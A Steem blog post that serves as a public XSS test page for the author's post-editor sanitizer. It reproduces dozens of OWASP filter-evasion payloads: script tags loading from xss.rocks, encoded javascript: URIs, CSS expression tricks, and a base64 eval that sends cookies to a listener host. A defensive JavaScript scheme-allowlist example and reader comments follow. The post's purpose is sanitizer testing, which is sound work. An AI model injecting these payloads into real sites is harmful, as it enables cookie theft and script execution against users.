
Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet by steemchiller

<center>https://cdn.steemitimages.com/DQmbjbs2qYUDx7379aBgEMBt92efAowZtZ9mMdJ65RNrZxy/hacker-1944688_1280.jpg</center>

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png

This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can be used to test against many different XSS attacks on other platforms as well. If you should see a message stating 'XSS', the Steem platform you are using may not be secure and the developers need to be contacted immediately.

Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks, and I think it is a good idea to have a post to be able to easily test any coming changes in the future. A few things might still be added in the next few days.

I've spent some time checking the official <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet">XSS Filter Evasion Cheat Sheet</a> (last revision: 02/23/2019) and included the relevant attacks in this post.

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png 

~~~
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
~~~
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

---
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

---
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

---
~~~
<IMG SRC="javascript:alert('XSS');">
~~~
<IMG SRC="javascript:alert('XSS');">

---
~~~
<IMG SRC=javascript:alert('XSS')>
~~~
<IMG SRC=javascript:alert('XSS')>

---
~~~
<IMG SRC=JaVaScRiPt:alert('XSS')>
~~~
<IMG SRC=JaVaScRiPt:alert('XSS')>

---
~~~
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
~~~
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

---
~~~
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
~~~
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

---
~~~
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
~~~
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

---
~~~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
~~~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

---
~~~
<IMG SRC=# onmouseover="alert('xxs')">
~~~
<IMG SRC=# onmouseover="alert('xxs')">

---
~~~
<IMG SRC= onmouseover="alert('xxs')">
~~~
<IMG SRC= onmouseover="alert('xxs')">

---
~~~
<IMG onmouseover="alert('xxs')">
~~~
<IMG onmouseover="alert('xxs')">

---
~~~
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
~~~
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

---
~~~
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
~~~
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

---
~~~
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
~~~
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

---
~~~
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
~~~
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

---
~~~
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
~~~
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

---
~~~
<IMG SRC="jav	ascript:alert('XSS');">
~~~
<IMG SRC="jav	ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x09;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x09;ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

---
~~~
<IMG SRC=" &#14;  javascript:alert('XSS');">
~~~
<IMG SRC=" &#14;  javascript:alert('XSS');">

---
~~~
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

---
~~~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
~~~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

---
~~~
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

---
~~~
<<SCRIPT>alert("XSS");//<</SCRIPT>
~~~
<<SCRIPT>alert("XSS");//<</SCRIPT>

---
~~~
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
~~~
<SCRIPT SRC=http://xss.rocks/xss.js?< B >

---
~~~
<SCRIPT SRC=//xss.rocks/.j>
~~~
<SCRIPT SRC=//xss.rocks/.j>

---
~~~
<IMG SRC="javascript:alert('XSS')"
~~~
<IMG SRC="javascript:alert('XSS')"

---
~~~
<iframe src=http://xss.rocks/scriptlet.html <
~~~

---
~~~
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
~~~
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

---
~~~
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
~~~
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

---
~~~
<BODY BACKGROUND="javascript:alert('XSS')">
~~~
<BODY BACKGROUND="javascript:alert('XSS')">

---
~~~
<IMG DYNSRC="javascript:alert('XSS')">
~~~
<IMG DYNSRC="javascript:alert('XSS')">

---
~~~
<IMG LOWSRC="javascript:alert('XSS')">
~~~
<IMG LOWSRC="javascript:alert('XSS')">

---
~~~
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
~~~
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
</ul>

---
~~~
<IMG SRC='vbscript:msgbox("XSS")'>
~~~
<IMG SRC='vbscript:msgbox("XSS")'>

---
~~~
<IMG SRC="livescript:[code]">
~~~
<IMG SRC="livescript:[code]">

---
~~~
<svg/onload=alert('XSS')>
~~~
<svg/onload=alert('XSS')>

---
~~~
<BODY ONLOAD=alert('XSS')>
~~~
<BODY ONLOAD=alert('XSS')>

---
~~~
<BGSOUND SRC="javascript:alert('XSS');">
~~~
<BGSOUND SRC="javascript:alert('XSS');">

---
~~~
<BR SIZE="&{alert('XSS')}">
~~~
<BR SIZE="&{alert('XSS')}">

---
~~~
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
~~~
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

---
~~~
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
~~~
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">

---
~~~
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
~~~
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

---
~~~
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
~~~
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">

---
~~~
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
~~~
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

---
~~~
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
~~~
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

---
~~~
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
~~~
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

---
~~~
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
~~~
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
</a>
---
~~~
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
~~~
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

---
~~~
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
~~~
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

---
~~~
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
~~~
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

---
~~~
<XSS STYLE="xss:expression(alert('XSS'))">
~~~
<XSS STYLE="xss:expression(alert('XSS'))">

---
~~~
<XSS STYLE="behavior: url(xss.htc);">
~~~
<XSS STYLE="behavior: url(xss.htc);">

---
~~~
¼script¾alert(¢XSS¢)¼/script¾
~~~
¼script¾alert(¢XSS¢)¼/script¾

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

---
~~~
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
~~~
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

---
~~~
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
~~~
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

---
~~~
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
~~~
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

---
~~~
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
~~~
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

---
~~~
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
~~~
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

---
~~~
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
~~~
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

---
~~~
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>
~~~
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>

---
~~~
<DIV STYLE="width: expression(alert('XSS'));"></DIV>
~~~
<DIV STYLE="width: expression(alert('XSS'));"></DIV>

---
~~~
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->
~~~
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->

---
~~~
<BASE HREF="javascript:alert('XSS');//">
~~~
<BASE HREF="javascript:alert('XSS');//">

---
~~~
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
~~~
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>

---
~~~
<EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
~~~
<EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

---
~~~
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
~~~
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

---
~~~
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

---
~~~
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
~~~
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png

If you are a developer and you should need help in protecting your app against such attacks, feel free to leave me a message ;)

Just to be safe,

https://steemitimages.com/DQmarYCHGSBms38CSwf8Be3n56RN16nz8MS6MTSV2jX3TfT/chiller-footer-sh-400x90.png
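
The URL-scheme vectors in the post (mixed case, character references with and without semicolons, embedded tab/CR/LF, a leading control character) all target filters that search the raw attribute text for `javascript:`. As an added example, not part of the original post and not SteemWorld's sanitizer code: a check that normalizes an attribute value roughly the way a browser does and then allowlists the scheme. The function names, the http/https-only policy and the `example.com` URL are assumptions.

```javascript
// Assumed policy for URLs in user-supplied post content: absolute http(s) only.
const ALLOWED_SCHEMES = new Set(['http', 'https']);

// Decode numeric character references in a single pass: decimal or hex,
// zero-padded, with or without the trailing semicolon. Named references are
// NOT handled here; in production, take the attribute value as already
// decoded by a real HTML parser instead of re-implementing this step.
function decodeCharRefs(value) {
  return value.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g, (_, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    const valid = cp > 0 && cp <= 0x10ffff && !(cp >= 0xd800 && cp <= 0xdfff);
    return valid ? String.fromCodePoint(cp) : '\uFFFD';
  });
}

// Mirror the URL parser's preprocessing: strip leading/trailing C0 controls
// and spaces, drop every tab/LF/CR, then read the scheme case-insensitively.
function extractScheme(rawAttr) {
  let url = decodeCharRefs(rawAttr);
  url = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  url = url.replace(/[\t\n\r]/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null; // null = no scheme (relative reference)
}

// Allowlist decision: anything without an explicitly allowed scheme is rejected.
function isAllowedUrl(rawAttr) {
  const scheme = extractScheme(rawAttr);
  return scheme !== null && ALLOWED_SCHEMES.has(scheme);
}

// The weak approach, for comparison: look for the literal string in the raw text.
function naiveBlocklist(rawAttr) {
  return !rawAttr.toLowerCase().includes('javascript:');
}

// SRC values copied from the test vectors in the post, plus one benign URL
// constructed for this example (last entry).
const VECTORS = [
  "javascript:alert('XSS');",
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
  "jav\tascript:alert('XSS');",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  "jav&#x0D;ascript:alert('XSS');",
  " &#14;  javascript:alert('XSS');",
  "vbscript:msgbox(\"XSS\")",
  "https://example.com/picture.png", // constructed benign sample
];

// Run both checks over every vector; `true` means "would be let through".
function checkAll() {
  return VECTORS.map((value) => ({
    value,
    naive: naiveBlocklist(value),
    strict: isAllowedUrl(value),
  }));
}

for (const row of checkAll()) {
  console.log(
    `naive=${row.naive ? 'pass ' : 'block'} strict=${row.strict ? 'pass ' : 'block'}  ${JSON.stringify(row.value)}`
  );
}
```

A scheme check is only one layer: which tags and attributes may carry a URL at all, and whether event-handler attributes and `style` are dropped, is decided by the sanitizer's element and attribute allowlist.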
created 2019-03-08 10:50:15 · last update 2019-03-08 14:32:12
@amico ·
$0.07
___
### <center> Everything is okay! 👌 </center> 
___
You received an automatic vote, because I believe in you and I love what you create! ;) 

A huge hug from @amico! 🤗

<sup><sup><sup><sup> I love promoting !sbi status </sup></sup></sup></sup>
created 2019-03-08 12:29:36
@sbi4 ·
$0.11
Hi @amico!

* you have 140 units and 510 bonus units
* your rshares balance is 2513443120490 or 1.556 $
* your next SBI upvote is predicted to be 0.311 $
<br>
Did you know Steem Basic Income has a [Quality Policy](https://steemit.com/steem/@steembasicincome/sbi-responsible-voting-and-following)?
created 2019-03-08 12:31:33
@anshul1 ·
$0.07
Yes, there must be a proper security to ensure that the apps should be safe.
created 2019-03-08 11:54:27
@brittandjosie ·
I used steemworld today for looking up some info for my blog today so thanks for making it easier with steemworld
Gr. Britt
created 2019-03-12 15:11:57
@curationhelper ·
You just rose by 20.17% upvote from @curationhelper courtesy of @der-prophet
created 2019-03-08 13:32:57
@gillianpearce ·
$0.03
On a completely different note . . . I've noticed that when I edit a post, if it has a self vote steemworld counts it again. Is it possible to make it so the vote only gets counted once? The way it works currently means my self vote level shows as higher than it truly is.

No idea how easy or not that is to do but thought I'd mention it.

Thanks for all the great work you do. 😊
created 2019-03-08 11:32:36
@steemchiller ·
$1.03
I checked your self-vote rate and it seems to be correct. You created 7 posts and voted all of them with 100% (I couldn't even find an edited post). Since you only vote yourself and @artysteps (Looks like another account by you) with 100% and you vote all other accounts with 10-50%, I think your self-vote rate should in fact be much higher (at least 45%).

Keep in mind that on some day you might get flagged heavily by some whales for that ;)
created 2019-03-08 15:14:48
@gillianpearce ·
Hmmm. Ok. But I'm not sure why you can't see any edited posts. I definitely corrected a couple of spelling mistakes. Not important though. Thanks for checking.
created 2019-03-08 15:19:15
@luegenbaron ·
$0.10
I don't understand it completely - __thanks for your work anyway! ;)__

Posted using [Partiko Android](https://steemit.com/@partiko-android)
created 2019-03-08 11:03:09
@meins0815 ·
$0.11
The first post in (technical) "Chinese" that I have scrolled all the way through :))
but it could just as well be Klingon or Romulan!

Best regards
created 2019-03-08 11:44:54
@mellofello ·
$0.07
Thanks for keeping us safe.
created 2019-03-08 20:50:54
@nigelmarkdias · (edited)
$0.06
Great work. @SteemChiller
![902B6461-4C48-4342-ABE3-AC0066F1B54C.gif](https://cdn.steemitimages.com/DQmYbDgNrV7GLMyoxPiNs6SwwV8n6me3MKmtErBkgtTYsAV/902B6461-4C48-4342-ABE3-AC0066F1B54C.gif)
Resteemed.
Posted using [Partiko iOS](https://steemit.com/@partiko-ios)
created 2019-03-08 14:32:24 · last update 2019-03-08 18:10:09
@pennsif ·
$0.07
This post has been included in the latest edition of  [**SoS Daily News**](https://steemit.com/steem/@pennsif/sos-daily-news-news-about-the-state-of-steem-8-march-2019) - a digest of all the latest news on the Steem blockchain.
created 2019-03-09 20:52:54
@steem-ua ·
#### Hi @steemchiller!

Your post was upvoted by @steem-ua, new Steem dApp, using UserAuthority for algorithmic post curation!
Your **UA** account score is currently 6.244 which ranks you at **#236** across all Steem accounts.
Your rank has improved 1 places in the last three days (old rank 237).

In our last Algorithmic Curation Round, consisting of 182 contributions, your post is ranked at **#12**.
##### Evaluation of your UA score:

* You've built up a nice network.
* The readers appreciate your great work!
* Good user engagement!


**Feel free to join our [@steem-ua Discord server](https://discord.gg/KpBNYGz)**
created 2019-03-11 12:27:03
@steemprojects ·
This post has been just added as new item to _[timeline of SteemWorld on Steem Projects](https://steemprojects.com/projects/p/steemworld/?utm_source=comment_timeline&utm_medium=steem&utm_campaign=new_event&utm_content=c1)_.

If you want to be notified about new updates from this project, register on Steem Projects and add SteemWorld to your favorite projects.
created 2019-03-08 12:04:30